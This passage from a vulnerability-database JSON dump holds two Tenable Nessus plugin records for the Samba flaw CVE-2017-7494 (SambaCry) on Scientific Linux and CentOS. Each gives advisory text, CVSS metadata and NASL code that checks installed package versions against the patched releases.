"p-cpe:/a:fermilab:scientific_linux:samba-devel", "p-cpe:/a:fermilab:scientific_linux:samba-libs", "p-cpe:/a:fermilab:scientific_linux:samba-test", "p-cpe:/a:fermilab:scientific_linux:samba-krb5-printing", "p-cpe:/a:fermilab:scientific_linux:samba-winbind-krb5-locator", "p-cpe:/a:fermilab:scientific_linux:samba-winbind-devel", "p-cpe:/a:fermilab:scientific_linux:libsmbclient-devel", "p-cpe:/a:fermilab:scientific_linux:samba-test-libs", "p-cpe:/a:fermilab:scientific_linux:samba-common", "p-cpe:/a:fermilab:scientific_linux:samba-winbind-modules", "p-cpe:/a:fermilab:scientific_linux:samba-dc-libs", "p-cpe:/a:fermilab:scientific_linux:samba-python", "p-cpe:/a:fermilab:scientific_linux:samba-pidl", "p-cpe:/a:fermilab:scientific_linux:samba-client", "p-cpe:/a:fermilab:scientific_linux:samba-swat", "p-cpe:/a:fermilab:scientific_linux:samba-vfs-glusterfs", "p-cpe:/a:fermilab:scientific_linux:samba-winbind", "p-cpe:/a:fermilab:scientific_linux:samba-winbind-clients", "p-cpe:/a:fermilab:scientific_linux:samba-glusterfs", "p-cpe:/a:fermilab:scientific_linux:libwbclient-devel", "p-cpe:/a:fermilab:scientific_linux:samba-dc", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:samba-debuginfo", "p-cpe:/a:fermilab:scientific_linux:libsmbclient", "p-cpe:/a:fermilab:scientific_linux:libwbclient", "p-cpe:/a:fermilab:scientific_linux:samba", "p-cpe:/a:fermilab:scientific_linux:samba-doc", "p-cpe:/a:fermilab:scientific_linux:samba-common-tools", "p-cpe:/a:fermilab:scientific_linux:samba-common-libs"], "id": "SL_20170524_SAMBA_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/100403", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100403);\n script_version(\"3.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-7494\");\n\n script_name(english:\"Scientific Linux Security Update : samba on SL6.x, SL7.x i386/x86_64 (20170524) (SambaCry)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A remote code execution flaw was found in Samba. A\n malicious authenticated samba client, having write\n access to the samba share, could use this flaw to\n execute arbitrary code as root. (CVE-2017-7494)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1705&L=scientific-linux-errata&F=&S=&P=7563\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?528384a6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-client-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-common-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-krb5-printing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-test-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-vfs-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"libsmbclient-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"libsmbclient-devel-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-client-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-common-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-debuginfo-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-doc-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-domainjoin-gui-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"x86_64\", reference:\"samba-glusterfs-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-swat-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-clients-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-devel-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba-winbind-krb5-locator-3.6.23-43.el6_9\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libsmbclient-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libsmbclient-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libwbclient-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libwbclient-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-client-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-client-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"samba-common-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-common-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-common-tools-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-dc-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-dc-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-debuginfo-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-krb5-printing-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"samba-pidl-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-python-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-test-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-test-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-vfs-glusterfs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-winbind-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-winbind-clients-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-winbind-modules-4.4.4-14.el7_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / libwbclient / libwbclient-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:31:15", "description": "An update for samba is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) protocol and the related Common Internet File System (CIFS)\nprotocol, which allow PC-compatible machines to share files, printers,\nand various information.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.", "edition": 35, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-26T00:00:00", "title": "CentOS 6 / 7 : samba (CESA-2017:1270) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-26T00:00:00", "cpe": ["p-cpe:/a:centos:centos:samba-libs", "p-cpe:/a:centos:centos:samba-pidl", "p-cpe:/a:centos:centos:samba-winbind-modules", "p-cpe:/a:centos:centos:samba-swat", "p-cpe:/a:centos:centos:samba-domainjoin-gui", "p-cpe:/a:centos:centos:samba-winbind-krb5-locator", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:samba-dc", "p-cpe:/a:centos:centos:samba-winbind", "p-cpe:/a:centos:centos:samba-test", "p-cpe:/a:centos:centos:samba-common-tools", "p-cpe:/a:centos:centos:samba-doc", "p-cpe:/a:centos:centos:samba-common", "p-cpe:/a:centos:centos:samba-devel", "p-cpe:/a:centos:centos:ctdb", "p-cpe:/a:centos:centos:samba-glusterfs", "p-cpe:/a:centos:centos:libwbclient", "p-cpe:/a:centos:centos:ctdb-tests", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:samba-common-libs", "p-cpe:/a:centos:centos:samba-vfs-glusterfs", "p-cpe:/a:centos:centos:samba-winbind-clients", "p-cpe:/a:centos:centos:samba-krb5-printing", "p-cpe:/a:centos:centos:samba-python", "p-cpe:/a:centos:centos:samba-client", "p-cpe:/a:centos:centos:samba", "p-cpe:/a:centos:centos:samba-dc-libs", "p-cpe:/a:centos:centos:libsmbclient", "p-cpe:/a:centos:centos:libwbclient-devel", "p-cpe:/a:centos:centos:libsmbclient-devel", "p-cpe:/a:centos:centos:samba-client-libs", "p-cpe:/a:centos:centos:samba-test-libs", "p-cpe:/a:centos:centos:samba-winbind-devel"], "id": "CENTOS_RHSA-2017-1270.NASL", "href": "https://www.tenable.com/plugins/nessus/100428", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1270 and \n# CentOS Errata and Security Advisory 2017:1270 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100428);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"RHSA\", value:\"2017:1270\");\n\n script_name(english:\"CentOS 6 / 7 : samba (CESA-2017:1270) (SambaCry)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for samba is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) protocol and the related Common Internet File System (CIFS)\nprotocol, which allow PC-compatible machines to share files, printers,\nand various information.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-May/022419.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?63336008\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-May/022420.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0810f584\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7494\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-client-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-common-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-krb5-printing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-test-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-vfs-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x / 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"libsmbclient-devel-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-client-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-common-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-doc-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-domainjoin-gui-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", cpu:\"x86_64\", reference:\"samba-glusterfs-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-swat-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-clients-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-devel-3.6.23-43.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba-winbind-krb5-locator-3.6.23-43.el6_9\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ctdb-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"ctdb-tests-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libsmbclient-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libsmbclient-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libwbclient-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libwbclient-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-client-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-client-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-common-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-common-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-common-tools-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-dc-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-dc-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-krb5-printing-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-pidl-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-python-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-test-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-test-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-vfs-glusterfs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"samba-winbind-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", 